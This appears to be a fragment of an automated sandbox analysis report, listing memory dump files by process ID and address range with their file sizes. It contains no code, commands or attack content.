memory/2236-300-0x00007FF9D1D50000-0x00007FF9D1D60000-memory.dmpFilesize
64KB
-
memory/2272-176-0x00007FF9F2ED0000-0x00007FF9F3991000-memory.dmpFilesize
10.8MB
-
memory/2272-177-0x00007FF9F2ED0000-0x00007FF9F3991000-memory.dmpFilesize
10.8MB
-
memory/2272-174-0x000001CDDEEA0000-0x000001CDDEEC2000-memory.dmpFilesize
136KB
-
memory/2376-301-0x00007FF9D1D50000-0x00007FF9D1D60000-memory.dmpFilesize
64KB
-
memory/2392-302-0x00007FF9D1D50000-0x00007FF9D1D60000-memory.dmpFilesize
64KB
-
memory/2436-194-0x00007FF7FBDE1938-mapping.dmp
-
memory/2440-443-0x0000000000000000-mapping.dmp
-
memory/2484-303-0x00007FF9D1D50000-0x00007FF9D1D60000-memory.dmpFilesize
64KB
-
memory/2508-304-0x00007FF9D1D50000-0x00007FF9D1D60000-memory.dmpFilesize
64KB
-
memory/2516-306-0x00007FF9D1D50000-0x00007FF9D1D60000-memory.dmpFilesize
64KB
-
memory/2672-305-0x00007FF9D1D50000-0x00007FF9D1D60000-memory.dmpFilesize
64KB
-
memory/2680-307-0x00007FF9D1D50000-0x00007FF9D1D60000-memory.dmpFilesize
64KB
-
memory/2736-308-0x00007FF9D1D50000-0x00007FF9D1D60000-memory.dmpFilesize
64KB
-
memory/2752-309-0x00007FF9D1D50000-0x00007FF9D1D60000-memory.dmpFilesize
64KB
-
memory/2764-310-0x00007FF9D1D50000-0x00007FF9D1D60000-memory.dmpFilesize
64KB
-
memory/2776-311-0x00007FF9D1D50000-0x00007FF9D1D60000-memory.dmpFilesize
64KB
-
memory/2892-510-0x0000000000000000-mapping.dmp
-
memory/2896-235-0x0000000000000000-mapping.dmp
-
memory/2928-536-0x0000000000000000-mapping.dmp
-
memory/3060-272-0x00007FF9D1D50000-0x00007FF9D1D60000-memory.dmpFilesize
64KB
-
memory/3080-312-0x00007FF9D1D50000-0x00007FF9D1D60000-memory.dmpFilesize
64KB
-
memory/3116-504-0x0000000000000000-mapping.dmp
-
memory/3164-539-0x0000000000000000-mapping.dmp
-
memory/3196-237-0x0000000000000000-mapping.dmp
-
memory/3208-179-0x0000000000000000-mapping.dmp
-
memory/3212-229-0x0000000000000000-mapping.dmp
-
memory/3276-471-0x0000000000000000-mapping.dmp
-
memory/3284-481-0x0000000000000000-mapping.dmp
-
memory/3444-203-0x0000000002789000-0x00000000028C6000-memory.dmpFilesize
1.2MB
-
memory/3444-166-0x0000000000000000-mapping.dmp
-
memory/3444-178-0x0000000002278000-0x000000000277C000-memory.dmpFilesize
5.0MB
-
memory/3444-240-0x0000000002789000-0x00000000028C6000-memory.dmpFilesize
1.2MB
-
memory/3444-212-0x0000000002278000-0x000000000277C000-memory.dmpFilesize
5.0MB
-
memory/3500-526-0x0000000000000000-mapping.dmp
-
memory/3508-313-0x00007FF9D1D50000-0x00007FF9D1D60000-memory.dmpFilesize
64KB
-
memory/3544-245-0x0000000000000000-mapping.dmp
-
memory/3564-500-0x0000000000000000-mapping.dmp
-
memory/3728-231-0x0000000000000000-mapping.dmp
-
memory/3744-196-0x00007FF9F2FF0000-0x00007FF9F3AB1000-memory.dmpFilesize
10.8MB
-
memory/3744-198-0x00007FF9F2FF0000-0x00007FF9F3AB1000-memory.dmpFilesize
10.8MB
-
memory/3900-140-0x0000000000400000-0x0000000000405000-memory.dmpFilesize
20KB
-
memory/3900-133-0x0000000000000000-mapping.dmp
-
memory/3900-134-0x0000000000400000-0x0000000000405000-memory.dmpFilesize
20KB
-
memory/3920-233-0x0000000000000000-mapping.dmp
-
memory/3920-329-0x0000000000000000-mapping.dmp
-
memory/4008-189-0x0000000000000000-mapping.dmp
-
memory/4024-182-0x0000000000000000-mapping.dmp
-
memory/4036-190-0x0000000000000000-mapping.dmp
-
memory/4128-484-0x0000000000000000-mapping.dmp
-
memory/4184-463-0x0000000000000000-mapping.dmp
-
memory/4192-188-0x0000000000000000-mapping.dmp
-
memory/4240-132-0x0000000000000000-mapping.dmp
-
memory/4248-494-0x0000000000000000-mapping.dmp
-
memory/4320-433-0x0000000000000000-mapping.dmp
-
memory/4388-186-0x0000000000000000-mapping.dmp
-
memory/4400-262-0x0000000140000000-0x0000000140029000-memory.dmpFilesize
164KB
-
memory/4400-260-0x0000000140002314-mapping.dmp
-
memory/4400-259-0x0000000140000000-0x0000000140029000-memory.dmpFilesize
164KB
-
memory/4400-264-0x00007FFA104F0000-0x00007FFA105AE000-memory.dmpFilesize
760KB
-
memory/4400-263-0x00007FFA11CD0000-0x00007FFA11EC5000-memory.dmpFilesize
2.0MB
-
memory/4400-267-0x0000000140000000-0x0000000140029000-memory.dmpFilesize
164KB
-
memory/4440-454-0x0000000000000000-mapping.dmp
-
memory/4460-247-0x00000000077D0000-0x0000000007CFC000-memory.dmpFilesize
5.2MB
-
memory/4460-239-0x00000000064C0000-0x00000000064DE000-memory.dmpFilesize
120KB
-
memory/4460-210-0x0000000005400000-0x000000000550A000-memory.dmpFilesize
1.0MB
-
memory/4460-211-0x0000000005330000-0x000000000536C000-memory.dmpFilesize
240KB
-
memory/4460-209-0x0000000002D70000-0x0000000002D82000-memory.dmpFilesize
72KB
-
memory/4460-208-0x0000000005910000-0x0000000005F28000-memory.dmpFilesize
6.1MB
-
memory/4460-201-0x0000000000400000-0x0000000000420000-memory.dmpFilesize
128KB
-
memory/4460-254-0x0000000007050000-0x00000000070A0000-memory.dmpFilesize
320KB
-
memory/4460-200-0x0000000000000000-mapping.dmp
-
memory/4460-246-0x00000000070D0000-0x0000000007292000-memory.dmpFilesize
1.8MB
-
memory/4460-238-0x00000000061B0000-0x0000000006226000-memory.dmpFilesize
472KB
-
memory/4548-516-0x0000000000000000-mapping.dmp
-
memory/4608-226-0x0000000000000000-mapping.dmp
-
memory/4656-412-0x0000000000000000-mapping.dmp
-
memory/4704-152-0x0000000007780000-0x000000000779A000-memory.dmpFilesize
104KB
-
memory/4704-146-0x0000000005E50000-0x0000000005EB6000-memory.dmpFilesize
408KB
-
memory/4704-151-0x0000000007DC0000-0x000000000843A000-memory.dmpFilesize
6.5MB
-
memory/4704-150-0x0000000006A10000-0x0000000006A2E000-memory.dmpFilesize
120KB
-
memory/4704-158-0x0000000007B10000-0x0000000007B32000-memory.dmpFilesize
136KB
-
memory/4704-157-0x00000000079F0000-0x00000000079F8000-memory.dmpFilesize
32KB
-
memory/4704-149-0x0000000070B00000-0x0000000070B4C000-memory.dmpFilesize
304KB
-
memory/4704-148-0x0000000007610000-0x0000000007642000-memory.dmpFilesize
200KB
-
memory/4704-156-0x0000000007A00000-0x0000000007A1A000-memory.dmpFilesize
104KB
-
memory/4704-141-0x0000000000000000-mapping.dmp
-
memory/4704-147-0x0000000006460000-0x000000000647E000-memory.dmpFilesize
120KB
-
memory/4704-154-0x0000000007A40000-0x0000000007AD6000-memory.dmpFilesize
600KB
-
memory/4704-155-0x00000000079B0000-0x00000000079BE000-memory.dmpFilesize
56KB
-
memory/4704-142-0x0000000002E70000-0x0000000002EA6000-memory.dmpFilesize
216KB
-
memory/4704-145-0x0000000005D70000-0x0000000005DD6000-memory.dmpFilesize
408KB
-
memory/4704-144-0x0000000005590000-0x00000000055B2000-memory.dmpFilesize
136KB
-
memory/4704-159-0x00000000089F0000-0x0000000008F94000-memory.dmpFilesize
5.6MB
-
memory/4704-153-0x00000000077F0000-0x00000000077FA000-memory.dmpFilesize
40KB
-
memory/4704-143-0x00000000056D0000-0x0000000005CF8000-memory.dmpFilesize
6.2MB
-
memory/4712-437-0x0000000000000000-mapping.dmp
-
memory/4888-191-0x0000000000000000-mapping.dmp
-
memory/4912-197-0x0000000000000000-mapping.dmp
-
memory/4920-423-0x0000000000000000-mapping.dmp
-
memory/4976-249-0x0000026F5C610000-0x0000026F5C630000-memory.dmpFilesize
128KB
-
memory/4976-248-0x00007FF701612720-mapping.dmp
-
memory/4976-256-0x00007FF700E20000-0x00007FF701614000-memory.dmpFilesize
8.0MB
-
memory/4976-252-0x00007FF700E20000-0x00007FF701614000-memory.dmpFilesize
8.0MB
-
memory/4976-255-0x0000026F5D040000-0x0000026F5D060000-memory.dmpFilesize
128KB
-
memory/4992-342-0x0000000000000000-mapping.dmp
-
memory/5004-163-0x0000000000000000-mapping.dmp
-
memory/5028-244-0x00007FF737C914E0-mapping.dmp
-
memory/5036-227-0x0000000000000000-mapping.dmp
-
memory/5048-475-0x0000000000000000-mapping.dmp
-
memory/5048-346-0x0000000000000000-mapping.dmp
-
memory/5096-184-0x0000000000000000-mapping.dmp